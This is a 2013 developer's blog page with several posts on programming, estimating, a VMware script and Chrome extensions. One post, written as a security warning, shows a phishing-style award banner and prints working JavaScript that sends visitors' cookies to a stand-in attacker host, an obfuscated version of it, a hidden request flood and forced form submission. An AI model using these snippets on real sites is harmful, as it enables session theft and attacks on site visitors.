Aaron Saray

open source programmer,
web developer

entrepreneur, author
and musician

My Blog

contains PHP, Web and business/entrepreneurial related content. Please join in the conversation!

Enable your blog comments already!

Posted on May 21, 2013 by Aaron

Angry BirdsSorry for the mini-rant here…

I’ve ran into a couple websites lately now that have disabled their comments sections. They were technical articles – and I had feedback or questions. I wanted to comment and join a conversation. One had said they just don’t accept comments anymore. Others had said that they prefer the conversation goes to twitter.

That twitter thing really irritated me. If I have more than 140 characters to say about your multi-page blog post, what do I do? Do I use the twitter plugin to make a longer status? What if I had a code correction? Do I now have to go out and use pastebin or gist and then put that in my link? What if I want to explain to you what that gist is? Well I have 140 characters minus the length of the shortened URL to do that. GRRR. At the very least, then shouldn’t articles at least have hashtags or something? So you can embed the conversation?

So, enable your blog comments. Let people give you suggestions. Oh – and my favorite excuse: too much spam? RIGHT. Now you’re just being silly. Chances are you don’t get too much spam – you just had two or three that hit ‘pending’ – and you had to go in and delete them. Whatever. Deal with it. What that says to me is that the quick amount of time you have to spend deleting a spam is much more important than anything I have to say to you, as one of your fans and readers? Not very good…

Posted in business | Tagged | Leave a comment

VMWare Script to Toggle VMWare Workstation start/suspend

Posted on May 14, 2013 by Aaron

Normally I have multiple vm’s running for various different projects – all of these are in VMWare Workstation instances I toggle between suspend and started. I decided to create a script and an Ubuntu launcher icon for toggling the vms back and forth.

First, check out the launcher I used:

File location: /home/aaron/.local/share/applications/vmware-myproject.desktop

[Desktop Entry]
Name=VMWare MyProject Toggle
GenericName=VMWare MyProject Toggle
Comment=Run VMWare
Exec=/home/aaron/vmware-toggle-myproject.sh
Icon=vmware-workstation
StartupNotify=true
Terminal=false
Type=Application
Categories=Programming;IDE;

The bash toggle script checks to see if the current VM is running, and then does the appropriate action depending on if it was found or not.

?View Code BASH
1
2
3
4
5
6
7
8
9
10
11
#!/bin/bash

VM="/home/aaron/vmware/myproject/myproject.vmx"
RUNNING=`vmrun list`

if [[ "$RUNNING" == *"$VM"* ]]
then
  vmrun suspend "$VM" soft
else
  vmrun start "$VM"
fi

So, when I start my day, all I have to do is type the name of my project and hit enter on the launcher. When the day is done, no need to find the VM’s small X on the tab – I just run the toggle again and its suspended.

Posted in linux, scripting | Tagged , | Leave a comment

Speaking at Milwaukee Wordcamp 2013

Posted on May 5, 2013 by Aaron

Milwaukee Wordcamp 2013As you may or may not be able to tell, I use WordPress on this website. So, I guess that makes me a fan… (trust me, as a programmer, I’ve always toyed around with writing my own custom blog software just for my domain – but alas, other aspirations always trumped that. Plus, wordpress is perfect for what I need.)

Last year, I spoke about WordPress Plugin Security – for the first Milwaukee Wordcamp ever. I had a great time and really liked it.

This year, I’ll be again at the conference, giving my talk for this year entitled “7 Things I Wish Someone Would Have Told Me” – a talk about what I’ve learned over my many years of being a programmer. I’m excited to share this talk – and to hopefully help other programmers who are coming up in the ranks – as well as remind all the mentors out there what we need to teach the youngin’s.

So, if you’re free June 7-9, and have $20 to spare (Yup, its $25 – but use SARAY as a coupon code and you’ll save five bucks), go over to Milwaukee WordCamp 2013 website and register now. :)

Posted in wordpress | Tagged | Leave a comment

Developers: How to get your estimates right

Posted on April 30, 2013 by Aaron

Estimates can be one of the hardest things to create as a developer. The word estimate is a misnomer in our industry. It’s almost as if they should be called “agreements” or “promises” according to some bosses. Yet we all know that they are just that: an estimate of the amount of time, not a guarantee.

Estimates can also be toxic. If you continually come in under estimate, some project managers will start to shrink your estimates without telling you. Then, the time that you really do need that estimated time, those outside of the programmers group will think you went over. The opposite is also true: go over your estimate continually, and you may be judged as a bad performer.

So, it is very important to get your estimates right. So, how do we do this?

I follow three steps when estimating: Preliminary research, Planning, and Saying no.

Preliminary Research

If you want to become a great estimator, there is no magical way to do this but to know how long it takes you to do something. That’s the advice everyone gives… if you want to estimate, look at last time you did XYZ feature and use that as a guide. But what if you haven’t had to submit an estimate for that style of feature before?

How easy is it to just pump out a block of code or a feature on your software with no timelimit or timeline? Let me tell you – it is VERY easy and also VERY great. It feels awesome to accomplish a task without a marketing, business, or even arbitrary limitation of time. However, if you find yourself with this good fortune, do not rest!

Instead, always estimate all of your tasks even if you’re not required to submit one. Then, track your time and at the end of the project compare your totals. This research is yours and yours alone. You will learn to become a better estimator and know your skillset and timelines best this way.

Planning

When I create an estimate, I try to break down the tasks into hours/days measurements. I don’t quote anything less than 2 to 4 hours. Anything over 2 weeks, I find a way to break that up into subtasks. This planning gives me a good handle on how my project will run. It also serves as a sort of road map.

Now, be honest: how many times have you thought a task will be done “in no time” but it actually took half the day? That’s where this second tip for planning comes in. We tend to estimate less time than is needed. Call it ignorance, hubris, or superman complex, but it happens. So, when I plan my tasks, I make three columns. The first is my estimate. The second is + 20% – and is labeled ‘probable’ and the third is 40% and labeled ‘worst case.’ When I submit my estimate, I always submit a combination of the probable and worst case. Oh, and finally, I always figure in a 20% unknown into the totals as well. So at the end of the first column, add those totals up and take 20% of that total and add it to the grand total. That of course gets expanded as the columns move to the right.

The great tool here is that we often understimate – and the 20% column USUALLY covers that. However, I like to look at those numbers during/after the project and use those to learn to refactor my estimates for the future. If I’m consistently in “worst case” column, something is going wrong!

Just say No

Or, … slap “scope creep.” It can be really hard to say no to a boss or a project manager when they ask for more features. But, I implore you: for the sanity of your estimation scores and your reputation, say no. Say no respectfully. Say no with facts. But say no. Do not let additional things get in there.

However, sometimes its unavoidable. Whatever happens, put a number on that ‘yes’. That extra work doesn’t come cheap. You didn’t estimate it. Give an off-the-cuff estimate addition. “Yes, I will do what you want, even though it wasn’t part of my original plan. It will add on approximately 3 hours. Are you ok with this?” And make sure to document this!

Good Luck

Good luck! Estimation is not a science. But I can tell you, after many years of this, if you really pay attention to your skills and speed, you’ll get a good idea of what you can do and how long it will take you.

Posted in professional tips, programming | Tagged , | 1 Comment

Beware of Javascript frameworks extending the Array

Posted on April 23, 2013 by Aaron

Just a little fun for today…

MooTools, a common Javascript framework, is responsible for extending an array in Javascript. It adds a number of useful features to each array that is created.

However, this can be a problem. When creating a third-party javascript widget, I created an array of properties that needed to be iterated through. I obviously cannot depend on a specific Javascript framework to be present… so I did something like this:

?View Code JAVASCRIPT
1
2
3
for (x in myArray) {
    doSomethingWith(myArray[x]);
}

Well, since each array – on creation – has the methods from the prototype being extended, I now have extra items in my array. This was causing an error because my function was not expecting a function to be passed in, only a string.

So that’s why this is bad. So don’t do that in Javascript, ok? Thanks! :)

Posted in javascript | Tagged | Leave a comment

The very bad things that Javascript can do: Part 2

Posted on April 16, 2013 by Aaron

In part 1, I discussed the various arguments I run into about wanting to be overly security conscious with our sites in regard to third party javascript. In this entry, we’ll run through a few scenarios.

In our scenarios here, we’re going to focus on a fake award site called “AwardSite” that gave our victim a winning notification. They are in the top 5% of 2013′s best websites. The servers have PHP and are apache servers.

Perhaps they send an email like this:

Hello and congratulations!  Your site, http://victimsite.com, has won the prestigious Best of 2013 award from AwardSite.com!  

Did you know you made it into the top 5%?  We're impressed, and you should be proud!

Below, you'll find a snippet of code to insert into the footer of your website.  It shows off your great accomplishment.

Did you know AwardSite.com has a very high Search Engine Optimization ranking?  We're already linking to your website -
but that doesn't complete the circle.  If you use the banner in the code below, you not only show off your reputation this year but that reciprocal link helps Google AND Bing rank your site even higher.

Congratulations again!

Fake Guy
AwardSite.com

And of course, at the very end of the email is some HTML or Javascript that they are prompted to put into their site.

Now, for our example, we’re going to use the following banner:

award

Now, lets run through some scenarios.

Hit Counter / Target Determination

In this case, the nefarious hacker wants to determine if this site has a lot of traffic. And, of that traffic, they want to determine what the demographics of the browsers are. This is a very easy information gathering attempt. This is what the code looks like:

?View Code HTML
1
<a href="http://awardsite.com"><img src="http://awardsite.com/award.png?compress=134"></a>

Let’s break down what the code means, and then show the back-end. First, it is just a link to the awardsite website. The image is the banner that you saw above. Finally, that image has a pretty non-conspicuous get parameter called ‘compress’ which is set to the ID in the database of this particular victim site. It was important to use a word that SEEMED somewhat legitimate. Of course compress seems ok, so why would I judge that?

On the server, however, the file award.png is actually a PHP file. The apache server has configuration, perhaps in the .htaccess file, like this:

?View Code APACHE
1
2
3
<Files award.png>
    ForceType application/x-httpd-php
</Files>

Then, the award.png file has the following PHP. (Please note, I’ve not went to the trouble to make sure this handles EVERY scenario… this is meant as a proof of concept).

Note: updateSite() is a function that writes an entry to the database using that siteID. I didn’t think it was important enough to show that code too.

?View Code PHP
1
2
3
4
5
6
7
8
9
10
<?php
$siteID = isset ($_GET['compress']) ? $_GET['compress'] : null;

if ($siteID) {
    $header = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '';
    updateSite($siteID, $header);
}

header('Content-type: image/png');
readfile('sourceawardfile.png');

This code basically gets the siteID from the GET query. It then grabs the user agent and inserts that into the database with the siteID. This works as a hit-counter and a demographics tracking. The backend will have to have some sort of analytic processing software to determine which browsers are visiting, etc.

No matter if there’s a valid siteID or not, finally the png header gets sent and the real award file is sent to the browser.

In this case, our victim has allowed the “bad guy” to keep track of their visitors, times, and demographics. They can now determine if this is a high traffic site or not – and whether its worth targeting specifically with more sophisticated attacks.

Cookie Stealing / Session Theft

PHP stores the session key as a cookie on the visitors browser named PHPSESSID by default. If the hacker had this cookie, and the session hadn’t expired, they could act as the victim. The goal here is to have a logged in user of victim website visit the bad Javascript. Then, the cookie is sent to the hacker who then uses that to steal the session of the victim.

Here is the source code for the HTML/Javascript from the email:

?View Code HTML
1
2
3
4
5
6
7
<a href="http://awardsite.com" id="awardlink">
    <script>
        var i = new Image();
        i.src = 'http://awardsite.com/award.png?c=' + document.cookie;
        document.getElementById('awardlink').appendChild(i);
    </script>
</a>

Here, a new image is created. Then, it is sent to the award.png PHP file. In this case, we grab the entire document.cookie. The cookie can then be parsed from the string of the GET parameter. Finally, the image is added to the file and no one is the wiser.

Of course, this kind of can look a bit bad if you see the words ‘document.cookie’ – so we can obscure this a bit. Try this:

?View Code JAVASCRIPT
1
2
3
4
5
6
        var s = 'http://awardsite.com/award.png';
        var i = new Image();
        var _0xba4e=["\x63\x6F\x6F\x6B\x69\x65"];
        var j=document[_0xba4e[0]];
        i.src = concat(s,'?c=', j);
        document.getElementById('awardlink').appendChild(i);

Of course, it can look bad for our trained eyes… but for those who don’t “work on computers” they’ll just think its code they don’t understand and use it.

For future examples, I won’t show how to obfuscate the code. But that would be one of the steps.

Denial of Service for Victim Site

What if we could make the visitor perform a denial of service? That wouldn’t be that hard.

?View Code HTML
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<a href="http://awardsite.com" id="awardlink">
    <script>
        var s = 'http://awardsite.com/award.png';
        var i = new Image();
        document.getElementById('awardlink').appendChild(i);
        setTimeout(function() {
            for (var x = 0; x < 1000; x++) {
                var j = new Image();
                j.style = 'display: none';
                j.src = 'http://victimsite.com/someasset.php';
                document.body.appendChild(j);
            }
        }, 3000);
    </script>
</a>

In this case, the image is added successfully. However, the setTimeout() method executes a different function 3 seconds later. The delay is so that the user won’t notice the delay in their browser (hopefully the entire site has loaded by then) – and it puts it in the background. Then, a new ‘image’ is created 1000 times and appended to the document – with a hidden display (so the visitor can’t tell). But, basically, one visitor to this site, especially if they spent some time just reading the content, loaded 1000 more requests than were necessary.

Processing Actions as the Victim

We all know that we need to not have forms that submit with the method of GET if the action is something that adds/edits/updates information. This restricts me from creating a sample that uses the Image() object to load a fake form submission with GET parameters. However, it doesn’t stop us from submitting a form that MAY be on the current page.

?View Code HTML
1
2
3
4
5
6
7
8
9
10
11
<a href="http://awardsite.com" id="awardlink">
    <script>
        var s = 'award.png';
        var i = new Image();
        i.src = s;
        document.getElementById('awardlink').appendChild(i);
        var f = document.getElementById('formID');
        f[0].value = 'Some Nefarious Input';
        f.submit();
    </script>
</a>

This code goes and gets the form with an ID of ‘formID’ and populates the first element with some bad information. Then it clicks submit.

This is bad, but there are some potential problems. What if… the form doesn’t have an ID? Remember, we could also do some research, determine this is the second form on the page, and substitute the following:

?View Code JAVASCRIPT
1
var f = document.forms[1];

OK, but lets just say its distracting to the visitor when the form is submitting. It takes them away from what they’re doing – of course they’re going to report it. Well, we can force the form to be ajax, and then submit.

?View Code JAVASCRIPT
1
2
3
4
f.onsubmit = function() {
    //code to create xmlhttprequest and send form as ajax
};
f.submit();

So what does all this mean?

Now that you’ve seen the examples of what can happen, I hope it turns on a light that we need to be more vigilant about what we allow clients to put into your hosted applications.

Posted in html, javascript, security | Tagged , , | 3 Comments

The very bad things that Javascript can do: Part 1

Posted on April 9, 2013 by Aaron

I have the argument a lot with product managers about allowing custom HTML and Javascript into our projects. I don’t want to do it. I want to only put in predefined, sanitized information. But more about my reasons after this… let’s look at the arguments I get first…

Point: Our clients are smart enough not to put in bad Javascript. Counter point: If they were really programmers, they probably wouldn’t be taking advantage of a service like a CMS. That isn’t to say that I don’t here for my blog – but generally, the customer doesn’t know what they’re doing. Don’t let the ability that they have been taught to use good UI confuse you that they know what they’re doing.

Point: Our clients are not the target of any hackers; they are non profits, etc. Counter point: Bot-nets exist because a lot of non-important users have had their computers infected. The attack isn’t against the infected computer, but is being leveraged against another third party. Bad hackers aren’t looking to attack our clients, probably, but they will use any available spring-board they can. Counter point: The better reputation our clients have, the more enticing they look. If a hacker could gain access to a .edu domain, you can bet its much more valuable than a random .com name. The .edu designation has a trust reputation. Plus, there are TONS of ill-intentioned internet users. Just because our client may not be the target of a high-profile, skilled hacking group, it doesn’t mean that a teenager in their bedroom learning how to hack for the first time won’t randomly pick them as a target. That could be devastating to our client – and it just turns out that it was random.

Point: If our clients make a mistake and allow their sites to get hacked, that’s their fault, not ours. Counter point: No matter what, its always our fault. For many reasons… First, if the client discovers the problem, they aren’t going to say “I was not informed and allowed my site to be hacked.” They will invariably say “My site, hosted by BLAHBLAH company, was hacked!” There is branding and word of mouth to worry about. Imagine if a car company didn’t make cars so safe. They could say “well, our clients shouldn’t hit brick walls” but we all say “no, that car should have protected me.”

So, now you may have an idea of how those arguments don’t always hold water. I still think its important to show what can really happen in the real world.

Part two the actual exploits that could happen. It will run through scenarios that make it really easy for the offending code to get on the site, and make it difficult for a casual user or for security analyzing scripts to detect rogue code.

Posted in javascript, security | Tagged , | 1 Comment

FirePHP4Chrome Chrome Extension

Posted on April 2, 2013 by Aaron

I use Chrome almost exclusively now. One thing that drove me nuts was the lack of support for FirePHP in the console of Chrome. Google even released some extensions for it – but they either didn’t work or were out of date. So I created my own.

FirePHP4Chrome Chrome Extension

Oh and here’s the source on Github

Posted in Google Chrome | Tagged | Leave a comment

Feedly Background Tab

Posted on March 26, 2013 by Aaron

After transitioning away from the doomed Google Reader to Feedly, I found it to be awesome! I only had one gripe with the shortcut key scenario… when you went to view the entire article in a new tab, it was always focused. This meant I’d still have to middle click with my mouse to put my tabs in the background.

After doing some research, I found a bunch of people actually had that problem. So I decided to make a chrome extension.

With “Feedly Background Tab” you can press the keyboard key b and it will open the current viewing story in a background tab.

Google Chrome Extension

Oh – and the source is on GitHub

Posted in Google Chrome | Tagged | 8 Comments

Make sure not to “too” future-proof your code

Posted on March 19, 2013 by Aaron

When doing a bit of code review, I saw an incredibly ornately architected future-proof module written by one of my programmers on my team. It had taken him roughly 3x as long as I had estimated, but the code was very complete. It was created in such a way that every single portion of it was modular and could be interchanged quite easily.

However, remember, it did take him 3x as long as we estimated.

If you work on timelines, you know that a project that takes 3x as long is not a success, no matter how great the code is. So, I started up the conversation with him asking about the reasons he made certain choices. Turns out, he had thought of almost every single future way to use this code and implemented architecture to support that. He covered instances where we might change our database, our models, even our front controller and consumption patterns.

While this is fine and dandy, I would say that he went too far with future proofing. And here’s why…

In the programming world, current tech moves so fast. We have to be constantly churning out new code to keep up with all the new features and technologies. This presents a difficult balance that we must consider. We need to create code that is able to be re-used when the dependency technologies change, but at the same time, need to hit deadlines for our current requirements. I would also submit that sometimes planning for technology interchange wastes current time so that by the time we finish, that technology we planned for is already out of date.

Now, don’t get me wrong. I’m not saying we shouldn’t future proof our code and keep it modular, but it has to be a balance. Get working code out the door that has the basic architecture to be modular. Each individual method doesn’t need to be interchangeable 100%.

Let me give an example. Say, there are three social networks out there that do music related communities for your music website: MySpace, MusicEar, and defNotes (I think I made up the last two). The requirements are to build a unified login system with a music website, preferably MySpace, for the music site you’re creating. You have three options:

  1. Cater to just MySpace
  2. Build a pluggable system for any network, then build a MySpace plugin
  3. Build a system with a basic framework to allow plugable items, but hard code in the MySpace dependency

Obviously, you now know my desire would be #3. Because, by the time you finished #2, MusicEar and defNotes may be out of business. And #1 doesn’t allow much flexibility for future networks that you don’t know about yet.

So, how would one do that? That’s where the balance comes in. But, I can think of some ways. Say, when you want to create a new instance of the social network class, call a factory method. This first iteration, all it does is return new MySpace(). In the future, if you implement a new network, you can then modify that factory method to return the proper class.

The balance comes from honestly assessing what the future may look like. Look at your client and customer base. What is the likelihood of that customer base using the other methods? If its not very high, don’t future-program for it.

Posted in programming | Tagged | 3 Comments